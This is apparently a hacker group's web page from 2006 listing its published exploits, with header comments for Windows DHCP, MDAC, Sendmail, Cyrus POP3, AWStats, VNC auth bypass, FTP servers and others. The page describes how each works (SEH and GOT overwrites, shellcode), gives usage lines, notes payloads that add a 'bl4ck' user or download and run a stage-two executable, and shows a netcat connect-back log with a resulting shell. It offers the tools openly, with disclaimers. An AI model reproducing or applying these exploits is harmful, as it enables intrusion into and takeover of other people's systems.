"Never let school get in the way of learning."
-- Mark Twain

[BL4CK] - Exploits

Publicly available exploits published by blacksec members. 

We are not responsible for your actions, this information has been published with the understanding that the viewer will use it responsibly and only for public security proof of concepts.  Exploiting vulnerable hosts may lead to jail time.

Exploits

MS06-036 Windows DHCP Client - Broadcast Attack



This is our present to BlackHat/Defcon.  If you're attending this year, STAY OFF THE INTRAWEBZ.


** This should not be used in any illicit manner**
** This is a proof of concept, and we cannot be **
** held liable for the misuse or alterations of **
** this code.                                   **

** Note: this proof of concept has only been tested on Windows 2000 sp4   **
**       this exploit will continuously reboot the affected computer,     **
**       indirectly bruteforcing the location of our address on the stack **
**       sometimes it's the first try, other times it takes 15 tries, it  **
**       all depends on how your stack is feeling today :)                **

**       this exploit will add a user bl4ck with the password bl4ck       **

MS06-036 - DHCP Client Service
Vulnerability in DHCP Client Service Could Allow Remote Code Execution (914388)
http://www.microsoft.com/technet/security/Bulletin/MS06-036.mspx

The DHCP API has a stack-based overflow in its mishandling of additional DHCP options.  By appending a severely long domain name (option 15) we can overwrite the SEH at the end of the stack.  The trick to this exploit is that it converts your ASCII buffer to Unicode on the stack, ergo you become limited in the options you can choose.

Cyrus Imapd POP3d Exploit


# cyrus-imapd pop3d exploit
# by bannedit
#
# 05/23/2006
#       This exploit takes advantage of a stack based overflow.
#       Once the stack corruption has occurred it is possible
#       to overwrite a pointer which is later used for a memcpy
#       this gives us a write anything anywhere condition similar
#       to a format string vulnerability.
#
#       I chose to overwrite the GOT table with my shellcode and
#       return to it. This defeats the VA random patch and possibly
#       other stack protection features.
#
#       tested on gentoo-sources linux 2.6.16

Sendmail 8.13.5 and below Remote Signal Handling Proof of Concept


# redsand@blacksecurity.org
# Sendmail 8.13.5 and below Remote Signal Handling exploit
# usage: rbl4ck-sendmail.py 127.0.0.1 0 25
#
#

# this exploit was leaked to the PHC (Phrack High Council)
# so instead of only letting them have a copy, we figure
# everyone should have what they have.
#
# :-)

#
# several of the tested operating systems appear to crash at a static
# string in memory and we were unable to shift the location of that crash.
# However, Fedora gives us a nice sexy soft spot to land, one that allows us
# to control the flow of code execution
# this is only a proof of concept
#

MS06-014 MDAC Code Execution in Internet Explorer


** This should not be used in any illicit manner**
** This is a proof of concept, and we cannot be **
** held liable for the misuse or alterations of **
** this code.                                   **

** this exploit will download a file hosted on  **
** the same domain and execute it locally on the**
** affected computer system                     **

MS06-014 - RDS DataStore
http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx

This exploit allows us to open up a valid Adodb Stream object and write
the contents of an AJAX request to any location on the affected system.
Furthermore, we are then able to execute our newly written script with the
privileges of the current user.

Our malicious contents from the XMLHTTP Request are written locally to the
Temp location with the CreateOverwrite flag set using the method "savetofile".

Usage: ./bl4ck_ms06_014.py /location/to/stage2.exe index.html
        (the file we want to execute must be hosted on the same site as the malicious html)

VNC 4.1.1 (VNC Null Authentication) Auth Bypass Patch



By redsand@blacksecurity.org
&&
zeroday@blacksecurity.org

http://blacksecurity.org

Greetings: #black, darkeagle, felinemenace and the whole gang at pulltheplug

This patch is for the real vnc source package:
vnc-4_1_1-unixsrc however other clients can be modified.

**Update
A win32 binary version is now available
BL4CK-vncviewer-authbypass.exe
MD5: 5ca3f79b193cf5aa43bfc0733d021a0c 

AWStats 6.x Migrate CMD Injection Connect-Back Exploit


#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by redsand@blacksecurity.org
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz

#
# sh0utz: felinemenace, pulltheplug.org, str0ke/milw0rm, and lets not forget #black
#      darkeagle/uKT, 0x557, and the ol' gang on DARPA
#

#
#    redsand@jinxy ~/ $ nc -l -p 31337 -v
#    listening on [any] 31337 ...
#    connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
#    id
#    uid=81(apache) gid=81(apache) groups=81(apache)
#

FILECOPA V1.01 and Below Pre-Authentication Remote Overflow



### FILECOPA DOS
### www.filecopa.com
### Found Jan 19 2006, Tested again on the new release 6 April 2006
### BY Bigeazer
### http://blacksecurity.org

### They are selling this software for $39.95...
### oh well.. maybe they should fix it first?

#
# It appears that FileCopa does not handle a lot of newline characters
# in the USER login.  This is in the filecpnt.exe file.
#
# This is only a DOS, that kills the ftp process


NASA IND Tree Graph Format String Overflow



This is an example format string overflow for some GPL'd NASA software that is available.  This is utterly pointless (and we know that) but it's fun to ./g0vt

IND: Creation and Manipulation of Decision Trees from Data
A common approach to supervised classification and prediction in artificial intelligence and statistical pattern recognition is the use of decision trees. A tree is "grown" from data using a recursive partitioning algorithm to create a tree which (hopefully) has good prediction of classes on new data. Standard algorithms are 1) that of Breiman, Friedman, Olshen, and Stone; and 2) Id3 and its successor C4 (by Quinlan). As well as reimplementing parts of these algorithms and offering experimental control suites, IND also introduces Bayesian and MML methods and more sophisticated search in growing trees. These produce more accurate class probability estimates that are important in applications like diagnosis.


/*
 * POC for nasa software (eek!)
 * Tree Graph Datamining Algorithm
 * rbl4ck-nasa-IND-Tree.c
 * indulgences by redsand
 * public - cuz this is pointless
 * however i wanted to say i wrote an exploit
 * for US Government software
 * shoutz to darkeagle @ blacksec
 * 03/09/2006
 * redsand@blacksecurity.org
 *
 * software found at: (tgen)
 * http://opensource.arc.nasa.gov/project.jsp?id=7
 */

Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)


##
# Written by Tim Shelton [redsand@redsand.net]
# GoldenFTPd
##

This advisory is included in CANVAS

creLoaded <= 6.15 Remote Command Exploit


#!/usr/bin/perl
#
# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda
#
# Rather simple exploit, but still an exploit nonetheless. Attempts to upload php script and
# utilise that to execute commands, and show off a fake shell.
#
# Can specify:
# * User-defined PHP script or one provided in this script (suits most occasions)
# * Additional variables to pass to PHP script after upload
# * HTTP proxy
#
# Read the (messy) code before use.
#
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz, #black
#

Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (meta)


##
# Written by redsand
#
# This is simple, look for a {call,jmp} esp
##

Windows Media Player 7.1 <= 10 BMP Heap Overflow PoC (MS06-005)



# sploit creator by redsand@blacksecurity.org
# ms06-005 advisory proof of concept
# heap overflow in wmf.dll @ 0x0035920a
# denial of service, cuz we can't get this to play nice